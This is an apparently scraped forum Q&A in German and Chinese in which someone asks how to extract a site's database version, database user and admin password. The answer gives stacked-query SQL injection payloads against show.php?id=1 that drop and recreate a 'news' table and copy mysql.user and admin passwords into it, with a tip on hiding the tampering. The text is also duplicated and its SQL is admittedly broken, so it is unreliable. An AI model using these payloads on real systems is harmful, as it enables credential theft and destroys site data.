Es gibt so einen PHP-Code
Bitte erklären Sie mir, wie ich mit dem Skript die Datenbankversion, den Datenbankbenutzer und den Passwortinhalt mit Feld 1 abfragen kann
你意会吧,如果是我的话我可能会试一下这么做。。。sql注入只了解一些简单的原理来着。。。sql语法我都忘光了。。。语法不对的部分你自己查一下语法改下吧。。。
# 获得数据库版本 show.php?id=1;drop table news; create table news(title char(1024),id int); insert into news values(select version(), 1); show.php?id=1 # 获取数据库用户 show.php?id=1;drop table news; create table news(title char(1024), id int); select user,1 from mysql.user into news; show.php?id=1 # 获取表admin ID为1字段password的内容 show.php?id=1;drop table news; create table news(title char(1024), id int); select password, 1 from admin where id = 1 into news; show.php?id=1
额对了。。一般还是别做得这么绝。。。rename一下原来的news,所有的信息都查完之后把没用的news删掉再rename回去吧。。。但是rename语句我忘掉了。。。
![[Web-Frontend] Node.js-Schnellstart](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
你意会吧,如果是我的话我可能会试一下这么做。。。
sql注入只了解一些简单的原理来着。。。
sql语法我都忘光了。。。语法不对的部分你自己查一下语法改下吧。。。
额对了。。一般还是别做得这么绝。。。
rename一下原来的news,所有的信息都查完之后把没用的news删掉再rename回去吧。。。但是rename语句我忘掉了。。。